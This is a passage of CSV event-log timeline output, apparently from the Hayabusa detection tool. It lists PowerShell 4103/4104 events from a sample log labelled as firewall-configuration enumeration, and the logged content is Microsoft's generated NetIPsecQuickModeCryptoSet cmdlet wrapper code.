$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvoca",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.020 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tionInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] 